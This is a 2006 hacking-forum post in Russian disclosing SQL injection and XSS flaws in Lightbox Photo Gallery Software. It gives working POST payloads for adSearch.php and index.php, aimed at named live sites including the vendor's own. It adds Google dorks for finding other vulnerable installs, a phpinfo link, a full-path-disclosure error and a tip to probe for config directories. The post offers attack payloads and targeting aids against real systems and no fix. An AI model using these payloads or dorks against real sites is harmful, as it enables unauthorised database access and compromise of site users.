Множественные уязвимости в платной фотогалерее Lightbox Photo Gallery Software

Discussion in 'Уязвимости' started by 1ten0.0net1, 13 Nov 2006.

  1. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    В версиях Advanced и Proffessional существует возможность проведения SQL - injection из-за отсутствия фильтрации спец. символов в переменной search_fields[]в скрипте adSearch.php (расширенный поиск).

    Пример:
    _http://www.gardenvisit.com/royalty-free-images/photos/adSearch.php
    Code:
     POST: [color=Teal]search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=ipts))/*&operand=OR&submit=Search[/color]
    
    Во всех версиях существует возможность проведения XSS (в этом скрипте это может быть использовано, напрмер, для доступа к приватной фотогалерее..)

    Уязвимы 2 параметра: email и category.

    Пример:
    _http://lightbox.adventistevangelism.com/index.php
    POST: category=%3Ch1%3EHidook!


    Google trick (dorks):
    SQL:
    Powered by Lightbox Photo Gallery Software & VSS ADVANCED SEARCH
    XSS: inurl:lightbox inurl:category

    По хорошей традиции решил проверить сайт разработчика бажного скрипта и вот что нашёл:

    _http://www.lightboxphoto.com/phpinfo.php
    Старенький Линух.
    Наша XSS:
    _http://www.lightboxphoto.com/sales_gallery/index.php
    POST: lightbox=&category=%3Ch1%3EOumph!%3C/h1%3E

    Наша SQL:
    _http://www.lightboxphoto.com/gallery_software_ent_demo/adSearch.php
    Code:
    [/color][color=Teal] POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=iptn))/*&operand=OR&submit=Search[/color]
    [color=Teal]

    Кроме того можно узнать полный путь из-за отсутствия
    фильтрации переменных, передаваемых в cookies. (возможно, это справедливо для всех сайтов, на которых установлен данный скрипт....)

    Warning: Cannot modify header information - headers already sent by (output started at
    /home/lightbox/public_html/sales_gallery/include/session_save_path.inc.php:7) in /home/lightbox/public_html/sales_gallery/include/session.inc.php on line 26


    P. S. Настоятельно рекомендуя проверять скрипт на наличие директории config.
     
    #1 1ten0.0net1, 13 Nov 2006
    Last edited by a moderator: 3 Dec 2006
    7 people like this.